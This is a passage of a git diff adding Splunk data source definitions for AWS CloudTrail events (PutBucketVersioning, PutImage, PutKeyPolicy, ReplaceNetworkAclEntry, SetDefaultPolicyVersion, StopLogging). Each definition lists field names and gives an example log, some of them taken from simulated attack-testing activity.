+  "ReplicationConfiguration": {"Role": "arn:aws:iam::111111111111:role/attack_range_bpatel",
+  "xmlns": "http://s3.amazonaws.com/doc/2006-03-01/", "Rule": {"Status": "Enabled",
+  "Destination": {"Bucket": "arn:aws:s3:::badpublicbuckettest"}, "Filter": "", "Priority":
+  0, "ID": "replication_x_test", "DeleteMarkerReplication": {"Status": "Disabled"}}}},
+  "responseElements": null, "additionalEventData": {"SignatureVersion": "SigV4", "CipherSuite":
+  "ECDHE-RSA-AES128-GCM-SHA256", "bytesTransferredIn": 416, "AuthenticationMethod":
+  "AuthHeader", "x-amz-id-2": "8UoliFe/sG2/v8qB2g763/g0Fy+kfaUqtKrzLHEILnHUisC3rL1dQfJ3NSIYcA/kzpIHQ955pGo=",
+  "bytesTransferredOut": 0}, "requestID": "14SAVMJNEJMTZN91", "eventID": "fbe079d1-bc6b-4ee0-8893-d2b412c5550f",
+  "readOnly": false, "resources": [{"accountId": "111111111111", "type": "AWS::S3::Bucket",
+  "ARN": "arn:aws:s3:::git-wild-hunt-results"}], "eventType": "AwsApiCall", "managementEvent":
+  true, "recipientAccountId": "111111111111", "vpcEndpointId": "vpce-a0d039c9", "eventCategory":
+  "Management", "tlsDetails": {"tlsVersion": "TLSv1.2", "cipherSuite": "ECDHE-RSA-AES128-GCM-SHA256",
+  "clientProvidedHostHeader": "s3.us-west-2.amazonaws.com"}}'
diff --git a/data_sources/aws_cloudtrail_putbucketversioning.yml b/data_sources/aws_cloudtrail_putbucketversioning.yml
new file mode 100644
index 0000000000..32c9cfd1d1
--- /dev/null
+++ b/data_sources/aws_cloudtrail_putbucketversioning.yml
@@ -0,0 +1,129 @@
+name: AWS CloudTrail PutBucketVersioning
+id: 17b2fc7d-c8ce-487c-8815-f9a65a09e980
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail PutBucketVersioning
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+  url: https://splunkbase.splunk.com/app/1876
+  version: 7.4.1
+fields:
+- _time
+- additionalEventData.AuthenticationMethod
+- additionalEventData.CipherSuite
+- additionalEventData.SignatureVersion
+- additionalEventData.bytesTransferredIn
+- additionalEventData.bytesTransferredOut
+- additionalEventData.x-amz-id-2
+- app
+- awsRegion
+- aws_account_id
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object
+- object_category
+- object_id
+- product
+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestID
+- requestParameters.Host
+- requestParameters.VersioningConfiguration.Status
+- requestParameters.VersioningConfiguration.xmlns
+- requestParameters.bucketName
+- requestParameters.versioning
+- resources{}.ARN
+- resources{}.accountId
+- resources{}.type
+- responseElements
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- start_time
+- timeendpos
+- timestartpos
+- tlsDetails.cipherSuite
+- tlsDetails.clientProvidedHostHeader
+- tlsDetails.tlsVersion
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.sessionContext.attributes.creationDate
+- userIdentity.sessionContext.attributes.mfaAuthenticated
+- userIdentity.sessionContext.sessionIssuer.accountId
+- userIdentity.sessionContext.sessionIssuer.arn
+- userIdentity.sessionContext.sessionIssuer.principalId
+- userIdentity.sessionContext.sessionIssuer.type
+- userIdentity.sessionContext.sessionIssuer.userName
+- userIdentity.type
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+- vpcEndpointId
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "AssumedRole", "principalId":
+  "AROAYTOGP2RLDF6WP4HD6:daftpunk@splunk.com", "arn": "arn:aws:sts::111111111111:assumed-role/AWSReservedSSO_SPLKAdministratorAccess_d9ce1347d0a6dd3f/daftpunk@splunk.com",
+  "accountId": "111111111111", "accessKeyId": "ASIAYTOGP2RLAQ5VXXXX", "sessionContext":
+  {"sessionIssuer": {"type": "Role", "principalId": "AROAYTOGP2RLDF6WP4HD6", "arn":
+  "arn:aws:iam::111111111111:role/aws-reserved/sso.amazonaws.com/us-west-2/AWSReservedSSO_SPLKAdministratorAccess_d9ce1347d0a6dd3f",
+  "accountId": "111111111111", "userName": "AWSReservedSSO_SPLKAdministratorAccess_d9ce1347d0a6dd3f"},
+  "webIdFederationData": {}, "attributes": {"creationDate": "2022-08-04T15:18:37Z",
+  "mfaAuthenticated": "false"}}}, "eventTime": "2022-08-04T15:19:25Z", "eventSource":
+  "s3.amazonaws.com", "eventName": "PutBucketVersioning", "awsRegion": "us-west-2",
+  "sourceIPAddress": "73.57.168.38", "userAgent": "[S3Console/0.4, aws-internal/3
+  aws-sdk-java/1.11.1030 Linux/5.4.196-119.356.amzn2int.x86_64 OpenJDK_64-Bit_Server_VM/25.302-b08
+  java/1.8.0_302 vendor/Oracle_Corporation cfg/retry-mode/standard]", "requestParameters":
+  {"bucketName": "git-wild-hunt-results", "Host": "s3.us-west-2.amazonaws.com", "versioning":
+  "", "VersioningConfiguration": {"Status": "Suspended", "xmlns": "http://s3.amazonaws.com/doc/2006-03-01/"}},
+  "responseElements": null, "additionalEventData": {"SignatureVersion": "SigV4", "CipherSuite":
+  "ECDHE-RSA-AES128-GCM-SHA256", "bytesTransferredIn": 125, "AuthenticationMethod":
+  "AuthHeader", "x-amz-id-2": "F3tJSu/C2DMkRNLldcWTRzApxQa6v197ImcuQDA++vaeaLj9UvcIkEFgDIrMYUdXLI4t+Uih5hk=",
+  "bytesTransferredOut": 0}, "requestID": "5KXZDSNDYXWC8Q4M", "eventID": "42d7a97e-9d35-4c8e-8d0a-4a82d91aab55",
+  "readOnly": false, "resources": [{"accountId": "111111111111", "type": "AWS::S3::Bucket",
+  "ARN": "arn:aws:s3:::git-wild-hunt-results"}], "eventType": "AwsApiCall", "managementEvent":
+  true, "recipientAccountId": "111111111111", "vpcEndpointId": "vpce-a0d039c9", "eventCategory":
+  "Management", "tlsDetails": {"tlsVersion": "TLSv1.2", "cipherSuite": "ECDHE-RSA-AES128-GCM-SHA256",
+  "clientProvidedHostHeader": "s3.us-west-2.amazonaws.com"}}'
diff --git a/data_sources/aws_cloudtrail_putimage.yml b/data_sources/aws_cloudtrail_putimage.yml
new file mode 100644
index 0000000000..c7897407fb
--- /dev/null
+++ b/data_sources/aws_cloudtrail_putimage.yml
@@ -0,0 +1,151 @@
+name: AWS CloudTrail PutImage
+id: bb13f10d-0d8c-4fde-9136-b7cfd930e87c
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail PutImage
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+  url: https://splunkbase.splunk.com/app/1876
+  version: 7.4.1
+fields:
+- _time
+- app
+- awsRegion
+- aws_account_id
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object_category
+- product
+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestID
+- requestParameters.imageManifest
+- requestParameters.imageManifestMediaType
+- requestParameters.imageTag
+- requestParameters.registryId
+- requestParameters.repositoryName
+- resources{}.ARN
+- resources{}.accountId
+- responseElements.image.imageId.imageDigest
+- responseElements.image.imageId.imageTag
+- responseElements.image.imageManifest
+- responseElements.image.imageManifestMediaType
+- responseElements.image.registryId
+- responseElements.image.repositoryName
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- start_time
+- timeendpos
+- timestartpos
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.invokedBy
+- userIdentity.principalId
+- userIdentity.sessionContext.attributes.creationDate
+- userIdentity.sessionContext.attributes.mfaAuthenticated
+- userIdentity.type
+- userIdentity.userName
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId":
+  "AAAAAAAAAAAAAAAAAAAAA", "arn": "arn:aws:iam::111111111111:user/test", "accountId":
+  "111111111111", "accessKeyId": "AAAAAAAAAAAAAAAAAAAAA", "userName": "test", "sessionContext":
+  {"sessionIssuer": {}, "webIdFederationData": {}, "attributes": {"creationDate":
+  "2021-08-18T23:15:39Z", "mfaAuthenticated": "false"}}, "invokedBy": "AWS Internal"},
+  "eventTime": "2021-08-18T23:17:30Z", "eventSource": "ecr.amazonaws.com", "eventName":
+  "PutImage", "awsRegion": "eu-central-1", "sourceIPAddress": "AWS Internal", "userAgent":
+  "AWS Internal", "requestParameters": {"registryId": "111111111112", "repositoryName":
+  "devsecops/cat_dog_server", "imageManifest": "{\n   \"schemaVersion\": 2,\n   \"mediaType\":
+  \"application/vnd.docker.distribution.manifest.v2+json\",\n   \"config\": {\n      \"mediaType\":
+  \"application/vnd.docker.container.image.v1+json\",\n      \"size\": 6591,\n      \"digest\":
+  \"sha256:547fc07c53533763d68ebdfdc45529b1db45301d07824410bcc30df866d67df1\"\n   },\n   \"layers\":
+  [\n      {\n         \"mediaType\": \"application/vnd.docker.image.rootfs.diff.tar.gzip\",\n         \"size\":
+  2811969,\n         \"digest\": \"sha256:540db60ca9383eac9e418f78490994d0af424aab7bf6d0e47ac8ed4e2e9bcbba\"\n      },\n      {\n         \"mediaType\":
+  \"application/vnd.docker.image.rootfs.diff.tar.gzip\",\n         \"size\": 35426616,\n         \"digest\":
+  \"sha256:f4fa1ac42c97abe89e0cc807af0ae4b63fbec2a5209a75a7239d099702c7fd80\"\n      },\n      {\n         \"mediaType\":
+  \"application/vnd.docker.image.rootfs.diff.tar.gzip\",\n         \"size\": 2347076,\n         \"digest\":
+  \"sha256:2b3e10d0c87c453eed1378e102ff1cc17aa4e3eed2159b7505959777a6225059\"\n      },\n      {\n         \"mediaType\":
+  \"application/vnd.docker.image.rootfs.diff.tar.gzip\",\n         \"size\": 280,\n         \"digest\":
+  \"sha256:43bd2fc3ba418e309449b8c82d723d9069ebb81863050dc0d6ad6e6ec0683808\"\n      },\n      {\n         \"mediaType\":
+  \"application/vnd.docker.image.rootfs.diff.tar.gzip\",\n         \"size\": 92,\n         \"digest\":
+  \"sha256:803d6b58954d4daee18ed071281627f8214f3d2ba1b9a419ab8834029310942a\"\n      },\n      {\n         \"mediaType\":
+  \"application/vnd.docker.image.rootfs.diff.tar.gzip\",\n         \"size\": 373,\n         \"digest\":
+  \"sha256:e664d5491b5c81e901a2293fbc025532a7cae0dcc75ce7418f854209aaa2474c\"\n      },\n      {\n         \"mediaType\":
+  \"application/vnd.docker.image.rootfs.diff.tar.gzip\",\n         \"size\": 2383293,\n         \"digest\":
+  \"sha256:b827c586a783ce490b79907607d535f99f42360b6ba86a4b2ac3e7f01542144d\"\n      },\n      {\n         \"mediaType\":
+  \"application/vnd.docker.image.rootfs.diff.tar.gzip\",\n         \"size\": 10001,\n         \"digest\":
+  \"sha256:0dd85ef396bcaded88fab4a8079d6b8bd5e3f8cf7eeb9b93306ffdb63401ba0a\"\n      }\n   ]\n}",
+  "imageManifestMediaType": "application/vnd.docker.distribution.manifest.v2+json",
+  "imageTag": "latest"}, "responseElements": {"image": {"registryId": "111111111112",
+  "repositoryName": "devsecops/cat_dog_server", "imageId": {"imageDigest": "sha256:b7798f35949cc1a2d435c9ac59ab69e857fe635a359c96e4f56a8498ce02019c",
+  "imageTag": "latest"}, "imageManifest": "{\n   \"schemaVersion\": 2,\n   \"mediaType\":
+  \"application/vnd.docker.distribution.manifest.v2+json\",\n   \"config\": {\n      \"mediaType\":
+  \"application/vnd.docker.container.image.v1+json\",\n      \"size\": 6591,\n      \"digest\":
+  \"sha256:547fc07c53533763d68ebdfdc45529b1db45301d07824410bcc30df866d67df1\"\n   },\n   \"layers\":
+  [\n      {\n         \"mediaType\": \"application/vnd.docker.image.rootfs.diff.tar.gzip\",\n         \"size\":
+  2811969,\n         \"digest\": \"sha256:540db60ca9383eac9e418f78490994d0af424aab7bf6d0e47ac8ed4e2e9bcbba\"\n      },\n      {\n         \"mediaType\":
+  \"application/vnd.docker.image.rootfs.diff.tar.gzip\",\n         \"size\": 35426616,\n         \"digest\":
+  \"sha256:f4fa1ac42c97abe89e0cc807af0ae4b63fbec2a5209a75a7239d099702c7fd80\"\n      },\n      {\n         \"mediaType\":
+  \"application/vnd.docker.image.rootfs.diff.tar.gzip\",\n         \"size\": 2347076,\n         \"digest\":
+  \"sha256:2b3e10d0c87c453eed1378e102ff1cc17aa4e3eed2159b7505959777a6225059\"\n      },\n      {\n         \"mediaType\":
+  \"application/vnd.docker.image.rootfs.diff.tar.gzip\",\n         \"size\": 280,\n         \"digest\":
+  \"sha256:43bd2fc3ba418e309449b8c82d723d9069ebb81863050dc0d6ad6e6ec0683808\"\n      },\n      {\n         \"mediaType\":
+  \"application/vnd.docker.image.rootfs.diff.tar.gzip\",\n         \"size\": 92,\n         \"digest\":
+  \"sha256:803d6b58954d4daee18ed071281627f8214f3d2ba1b9a419ab8834029310942a\"\n      },\n      {\n         \"mediaType\":
+  \"application/vnd.docker.image.rootfs.diff.tar.gzip\",\n         \"size\": 373,\n         \"digest\":
+  \"sha256:e664d5491b5c81e901a2293fbc025532a7cae0dcc75ce7418f854209aaa2474c\"\n      },\n      {\n         \"mediaType\":
+  \"application/vnd.docker.image.rootfs.diff.tar.gzip\",\n         \"size\": 2383293,\n         \"digest\":
+  \"sha256:b827c586a783ce490b79907607d535f99f42360b6ba86a4b2ac3e7f01542144d\"\n      },\n      {\n         \"mediaType\":
+  \"application/vnd.docker.image.rootfs.diff.tar.gzip\",\n         \"size\": 10001,\n         \"digest\":
+  \"sha256:0dd85ef396bcaded88fab4a8079d6b8bd5e3f8cf7eeb9b93306ffdb63401ba0a\"\n      }\n   ]\n}",
+  "imageManifestMediaType": "application/vnd.docker.distribution.manifest.v2+json"}},
+  "requestID": "805a31e6-0fed-433b-b393-f463c6881334", "eventID": "1aef3588-ae84-4f1f-9276-8ec94ee6a7e9",
+  "readOnly": false, "resources": [{"accountId": "111111111111", "ARN": "arn:aws:ecr:eu-central-1:1111111111111:repository/devsecops/cat_dog_server"}],
+  "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId": "111111111111",
+  "eventCategory": "Management"}'
diff --git a/data_sources/aws_cloudtrail_putkeypolicy.yml b/data_sources/aws_cloudtrail_putkeypolicy.yml
new file mode 100644
index 0000000000..eea4b02dda
--- /dev/null
+++ b/data_sources/aws_cloudtrail_putkeypolicy.yml
@@ -0,0 +1,132 @@
+name: AWS CloudTrail PutKeyPolicy
+id: 9c54c86b-43b9-4bb8-915d-6838beb7f07c
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail PutKeyPolicy
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+  url: https://splunkbase.splunk.com/app/1876
+  version: 7.4.1
+fields:
+- _time
+- app
+- awsRegion
+- aws_account_id
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- eventtype
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object_category
+- product
+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestID
+- requestParameters.bypassPolicyLockoutSafetyCheck
+- requestParameters.keyId
+- requestParameters.policy
+- requestParameters.policyName
+- resources{}.ARN
+- resources{}.accountId
+- resources{}.type
+- responseElements
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- start_time
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.sessionContext.attributes.creationDate
+- userIdentity.sessionContext.attributes.mfaAuthenticated
+- userIdentity.sessionContext.sessionIssuer.accountId
+- userIdentity.sessionContext.sessionIssuer.arn
+- userIdentity.sessionContext.sessionIssuer.principalId
+- userIdentity.sessionContext.sessionIssuer.type
+- userIdentity.sessionContext.sessionIssuer.userName
+- userIdentity.type
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "AssumedRole", "principalId":
+  "AROAIJIESMXKGCJRCTPR6:pbareiss@splunk.local", "arn": "arn:aws:sts::111111111111:assumed-role/okta_adm_role/pbareiss@splunk.local",
+  "accountId": "111111111111", "accessKeyId": "ASIAYTOGP2RLK74OPBDR", "sessionContext":
+  {"sessionIssuer": {"type": "Role", "principalId": "AROAIJIESMXKGCJRCTPR6", "arn":
+  "arn:aws:iam::111111111111:role/okta_adm_role", "accountId": "111111111111", "userName":
+  "okta_adm_role"}, "webIdFederationData": {}, "attributes": {"mfaAuthenticated":
+  "false", "creationDate": "2021-01-11T09:03:18Z"}}}, "eventTime": "2021-01-11T11:04:39Z",
+  "eventSource": "kms.amazonaws.com", "eventName": "PutKeyPolicy", "awsRegion": "us-west-2",
+  "sourceIPAddress": "95.90.199.65", "userAgent": "aws-internal/3 aws-sdk-java/1.11.893
+  Linux/4.9.230-0.1.ac.223.84.332.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.272-b10
+  java/1.8.0_272 vendor/Oracle_Corporation", "requestParameters": {"keyId": "f2a82583-a7d3-4c92-8787-fe2baab1cee1",
+  "policyName": "default", "policy": "{\n    \"Version\": \"2012-10-17\",\n    \"Id\":
+  \"key-consolepolicy-3\",\n    \"Statement\": [\n        {\n            \"Sid\":
+  \"Enable IAM User Permissions\",\n            \"Effect\": \"Allow\",\n            \"Principal\":
+  {\n                \"AWS\": \"arn:aws:iam::111111111111:root\"\n            },\n            \"Action\":
+  \"kms:*\",\n            \"Resource\": \"*\"\n        },\n        {\n            \"Sid\":
+  \"Allow access for Key Administrators\",\n            \"Effect\": \"Allow\",\n            \"Principal\":
+  {\n                \"AWS\": \"arn:aws:iam::111111111111:user/patrick_cli\"\n            },\n            \"Action\":
+  [\n                \"kms:Create*\",\n                \"kms:Describe*\",\n                \"kms:Enable*\",\n                \"kms:List*\",\n                \"kms:Put*\",\n                \"kms:Update*\",\n                \"kms:Revoke*\",\n                \"kms:Disable*\",\n                \"kms:Get*\",\n                \"kms:Delete*\",\n                \"kms:TagResource\",\n                \"kms:UntagResource\",\n                \"kms:ScheduleKeyDeletion\",\n                \"kms:CancelKeyDeletion\"\n            ],\n            \"Resource\":
+  \"*\"\n        },\n        {\n            \"Sid\": \"Allow use of the key\",\n            \"Effect\":
+  \"Allow\",\n            \"Principal\": {\n                \"AWS\": \"arn:aws:iam::111111111111:user/patrick_cli\"\n            },\n            \"Action\":
+  [\n                \"kms:Encrypt\",\n                \"kms:Decrypt\",\n                \"kms:ReEncrypt*\",\n                \"kms:GenerateDataKey*\",\n                \"kms:DescribeKey\"\n            ],\n            \"Resource\":
+  \"*\"\n        },\n        {\n            \"Sid\": \"Allow attachment of persistent
+  resources\",\n            \"Effect\": \"Allow\",\n            \"Principal\": {\n                \"AWS\":
+  \"arn:aws:iam::111111111111:user/patrick_cli\"\n            },\n            \"Action\":
+  [\n                \"kms:CreateGrant\",\n                \"kms:ListGrants\",\n                \"kms:RevokeGrant\"\n            ],\n            \"Resource\":
+  \"*\",\n            \"Condition\": {\n                \"Bool\": {\n                    \"kms:GrantIsForAWSResource\":
+  \"true\"\n                }\n            }\n        },\n        {\n            \"Sid\":
+  \"Allow use of the key\",\n            \"Effect\": \"Allow\",\n            \"Principal\":
+  {\n                \"AWS\": \"*\"\n            },\n            \"Action\": [\n                \"kms:Encrypt\"\n            ],\n            \"Resource\":
+  \"*\"\n        }\n    ]\n}", "bypassPolicyLockoutSafetyCheck": false}, "responseElements":
+  null, "requestID": "c7836c7a-ca95-47aa-a3fb-a7db0d66fec8", "eventID": "612f17e3-2317-4dd9-8aa3-393bc8a7961b",
+  "readOnly": false, "resources": [{"accountId": "111111111111", "type": "AWS::KMS::Key",
+  "ARN": "arn:aws:kms:us-west-2:111111111111:key/f2a82583-a7d3-4c92-8787-fe2baab1cee1"}],
+  "eventType": "AwsApiCall", "managementEvent": true, "eventCategory": "Management",
+  "recipientAccountId": "111111111111"}'
diff --git a/data_sources/aws_cloudtrail_replacenetworkaclentry.yml b/data_sources/aws_cloudtrail_replacenetworkaclentry.yml
new file mode 100644
index 0000000000..a507126200
--- /dev/null
+++ b/data_sources/aws_cloudtrail_replacenetworkaclentry.yml
@@ -0,0 +1,118 @@
+name: AWS CloudTrail ReplaceNetworkAclEntry
+id: db0c240e-3754-40e4-86ef-cde018ee9f65
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail ReplaceNetworkAclEntry
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+  url: https://splunkbase.splunk.com/app/1876
+  version: 7.4.1
+fields:
+- _time
+- action
+- app
+- awsRegion
+- aws_account_id
+- change_type
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- direction
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- eventtype
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object_category
+- product
+- protocol
+- protocol_code
+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestID
+- requestParameters.aclProtocol
+- requestParameters.cidrBlock
+- requestParameters.egress
+- requestParameters.networkAclId
+- requestParameters.ruleAction
+- requestParameters.ruleNumber
+- responseElements._return
+- responseElements.requestId
+- rule_action
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- src_ip_range
+- start_time
+- status
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.sessionContext.attributes.creationDate
+- userIdentity.sessionContext.attributes.mfaAuthenticated
+- userIdentity.sessionContext.sessionIssuer.accountId
+- userIdentity.sessionContext.sessionIssuer.arn
+- userIdentity.sessionContext.sessionIssuer.principalId
+- userIdentity.sessionContext.sessionIssuer.type
+- userIdentity.sessionContext.sessionIssuer.userName
+- userIdentity.type
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "AssumedRole", "principalId":
+  "AROAIJIESMXKGCJRCTPR6:pbareiss@splunk.local", "arn": "arn:aws:sts::111111111111:assumed-role/okta_adm_role/pbareiss@splunk.local",
+  "accountId": "111111111111", "accessKeyId": "ASIAYTOGP2RLF3F7BXZK", "sessionContext":
+  {"sessionIssuer": {"type": "Role", "principalId": "AROAIJIESMXKGCJRCTPR6", "arn":
+  "arn:aws:iam::111111111111:role/okta_adm_role", "accountId": "111111111111", "userName":
+  "okta_adm_role"}, "webIdFederationData": {}, "attributes": {"mfaAuthenticated":
+  "false", "creationDate": "2021-01-12T08:36:15Z"}}}, "eventTime": "2021-01-12T08:49:49Z",
+  "eventSource": "ec2.amazonaws.com", "eventName": "ReplaceNetworkAclEntry", "awsRegion":
+  "eu-central-1", "sourceIPAddress": "95.90.199.65", "userAgent": "console.ec2.amazonaws.com",
+  "requestParameters": {"networkAclId": "acl-078ccebebcbabe175", "ruleNumber": 20,
+  "egress": false, "ruleAction": "allow", "icmpTypeCode": {}, "portRange": {}, "aclProtocol":
+  "-1", "cidrBlock": "0.0.0.0/0"}, "responseElements": {"requestId": "97b40da9-9291-4a92-8e9e-892b6887ffc9",
+  "_return": true}, "requestID": "97b40da9-9291-4a92-8e9e-892b6887ffc9", "eventID":
+  "46fe04b8-d007-4933-8bb8-c8b65c1121fa", "readOnly": false, "eventType": "AwsApiCall",
+  "managementEvent": true, "eventCategory": "Management", "recipientAccountId": "111111111111"}'
diff --git a/data_sources/aws_cloudtrail_setdefaultpolicyversion.yml b/data_sources/aws_cloudtrail_setdefaultpolicyversion.yml
new file mode 100644
index 0000000000..0a522fb620
--- /dev/null
+++ b/data_sources/aws_cloudtrail_setdefaultpolicyversion.yml
@@ -0,0 +1,99 @@
+name: AWS CloudTrail SetDefaultPolicyVersion
+id: 06e0b5a0-8d36-485e-befc-4ae79d77ef6c
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail SetDefaultPolicyVersion
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+  url: https://splunkbase.splunk.com/app/1876
+  version: 7.4.1
+fields:
+- _time
+- action
+- app
+- awsRegion
+- aws_account_id
+- change_type
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- eventtype
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object_category
+- product
+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestID
+- requestParameters.policyArn
+- requestParameters.versionId
+- responseElements
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- start_time
+- status
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.type
+- userIdentity.userName
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId":
+  "AIDAYTOGP2RLESDK2NOSX", "arn": "arn:aws:iam::111111111111:user/AtomicRedTeam",
+  "accountId": "111111111111", "accessKeyId": "AKIAYTOGP2RLKMZDMPVA", "userName":
+  "AtomicRedTeam"}, "eventTime": "2021-03-02T21:05:49Z", "eventSource": "iam.amazonaws.com",
+  "eventName": "SetDefaultPolicyVersion", "awsRegion": "us-east-1", "sourceIPAddress":
+  "73.15.72.101", "userAgent": "aws-cli/2.0.62 Python/3.9.0 Darwin/19.6.0 source/x86_64
+  command/iam.set-default-policy-version", "requestParameters": {"policyArn": "arn:aws:iam::111111111111:policy/VulnerablePolicy",
+  "versionId": "v1"}, "responseElements": null, "requestID": "3bdf8738-2eab-4ae8-a858-2e2a4ccfc66b",
+  "eventID": "742f6e55-4bc7-49e2-965f-56ffbc46a980", "readOnly": false, "eventType":
+  "AwsApiCall", "managementEvent": true, "eventCategory": "Management", "recipientAccountId":
+  "111111111111"}'
diff --git a/data_sources/aws_cloudtrail_stoplogging.yml b/data_sources/aws_cloudtrail_stoplogging.yml
new file mode 100644
index 0000000000..3426d95f4e
--- /dev/null
+++ b/data_sources/aws_cloudtrail_stoplogging.yml
@@ -0,0 +1,95 @@
+name: AWS CloudTrail StopLogging
+id: c5de7c54-4809-4659-bf9f-3bacf8bdfd35
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail StopLogging
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+  url: https://splunkbase.splunk.com/app/1876
+  version: 7.4.1
+fields:
+- _time
+- app
+- awsRegion
+- aws_account_id
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object_category
+- product
+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestID
+- requestParameters.name
+- responseElements
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- start_time
+- timeendpos
+- timestartpos
+- tlsDetails.cipherSuite
+- tlsDetails.clientProvidedHostHeader
+- tlsDetails.tlsVersion
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.type
+- userIdentity.userName
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
